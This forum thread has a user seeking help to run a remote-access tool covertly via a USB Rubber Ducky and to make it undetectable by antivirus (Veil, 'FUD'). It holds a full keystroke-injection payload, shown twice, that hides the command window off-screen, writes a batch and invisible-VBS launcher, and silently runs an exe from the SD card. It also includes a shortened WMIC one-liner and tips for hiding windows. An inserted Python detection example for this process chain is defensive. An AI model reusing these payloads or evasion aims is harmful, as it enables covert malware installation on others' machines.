
need Rubber Ducky config


Net_Spy

Greetings,

I would like to set up a Rubber Ducky USB. I would appreciate your assistance, and I would also like to FUD my remote assistant tool exe. Any idea how to get this using Veil or any other good method to FUD it with 0 detection?

Thanks

Regards


Well, I've generated the following payload with the help of the GUI encoder.

REM Author: overwraith
REM Name: RunEXE_V3.txt
REM Purpose: Run an executable file off of the SD card after it mounts. Uses a slightly different version of the drive finder code.
REM Encoder V2.4+
REM Using the run command for a broader OS base.
DEFAULT_DELAY 75
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do (
ENTER
STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do (
ENTER
STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" )
ENTER
STRING )
ENTER
STRING )
ENTER
STRING if Exist %DuckyDrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %DuckyDrive%\form1.exe
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER

I copied the exe into the SD card root path, and inject.bin as well, then plugged it into Windows XP. It shows all the commands on the cmd screen but the exe does not execute.

Regards

Net_Spy
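
Added example (not part of the original thread and not overwraith's code): the process chain the RunEXE_V3 payload above would leave in process-creation logging, with three detection rules run over it. The event records, field names, PIDs, rule names and the E: drive letter are constructed assumptions.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style fields), simplified;
# not real telemetry. Field names and PIDs are assumptions for this example.
EVENTS = [
    {"pid": 10, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 20, "ppid": 10, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd /Q /D /T:7F /F:OFF /V:ON /K"},
    {"pid": 30, "ppid": 20, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": "wscript.exe invis.vbs DuckyWait.bat"},
    {"pid": 40, "ppid": 30, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": 'cmd /c "DuckyWait.bat"'},
    {"pid": 50, "ppid": 40, "image": r"E:\form1.exe", "cmd": r"E:\form1.exe"},
    {"pid": 60, "ppid": 10, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd /c "C:\build\make.bat"'},  # benign control case
]
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SYSTEM_DRIVE = "C"  # assumption: Windows is installed on C:

def name(event):
    return event["image"].rsplit("\\", 1)[-1].lower()

def ancestors(event, by_pid):
    """Yield parent, grandparent, ... stopping at unknown parents or loops."""
    seen = set()
    while event["ppid"] in by_pid and event["ppid"] not in seen:
        seen.add(event["ppid"])
        event = by_pid[event["ppid"]]
        yield event

def quiet_cmd(event, by_pid):
    # The switch cluster the payload types into the Run dialog.
    switches = set(event["cmd"].upper().split())
    return name(event) == "cmd.exe" and {"/Q", "/F:OFF", "/V:ON", "/K"} <= switches

def script_host_runs_batch(event, by_pid):
    # A .vbs launcher handed a batch file, as with invis.vbs DuckyWait.bat.
    return name(event) in SCRIPT_HOSTS and bool(
        re.search(r"\.vbs\b.*\.(bat|cmd)\b", event["cmd"], re.I))

def exe_off_system_drive(event, by_pid):
    # Binary started from another volume, descending from a script host.
    return event["image"][0].upper() != SYSTEM_DRIVE and any(
        name(a) in SCRIPT_HOSTS for a in ancestors(event, by_pid))

RULES = [quiet_cmd, script_host_runs_batch, exe_off_system_drive]

def detect(events):
    by_pid = {e["pid"]: e for e in events}
    return [(e["pid"], r.__name__) for e in events for r in RULES if r(e, by_pid)]
```

Calling `detect(EVENTS)` flags PIDs 20, 30 and 50 and leaves the benign `make.bat` invocation alone.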


It does not work. I've installed twin composite firmware; it worked. One more thing I would like to know: is there any way that the payload runs without any popup windows? Looking forward to your kind response.

Regards

Net_Spy

Sadly there isn't. The ducky is just a USB HID, so it is limited to only what a USB keyboard can do.


Thanks, but I just wanted to hide those windows which are opened via the above-mentioned script, like opening the run prompt and typing the command, then opening cmd, minimizing it, etc. I only want to know: is there a way to do all of this silently?

Regards

Net_Spy


You could just move the window out of view by doing the following:

ALT+SPACE
M
DOWN
DOWN
DOWN
ENTER

Just keep in mind the above is more or less pseudocode... all this is doing is bringing up a menu, choosing "Move" and then hitting the down key until it's off the screen, then hitting "Enter" to bring it back into focus. This way it's off the screen so no one can see it but you can still keep typing and running commands.


  • 5 months later...

Greetings,

I've come across a script that claims to be faster than the script written by overwraith:

REM Author: overwraith
REM Name: RunEXE_V3.txt
REM Purpose: Run an executable file off of the SD card after it mounts. Uses a slightly different version of the drive finder code.
REM Encoder V2.4+
REM Using the run command for a broader OS base. 
DEFAULT_DELAY 75
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Change directories because System32 appears to be protected. 
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( 
ENTER
STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do (
ENTER
STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" )
ENTER
STRING )
ENTER
STRING )
ENTER
STRING if Exist %DuckyDrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %DuckyDrive%\HelloWorld.exe
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER

overwraith's script is working great, only taking a few seconds and lots of commands.

Following is the shortened script:

DELAY 3000
GUI r
DELAY 100

cmd /c for /f %a in ('wmic volume get DriveLetter^, Label ^| find "DY"') do start %a\t.exe

DELAY 10
ENTER

I've tried it but failed to execute it. It gives the error: Windows cannot find 'c'. Make sure you typed the name correctly, and then try again.

Is there any way to make the above short script run an exe from SD?

Regards

Net_Spy
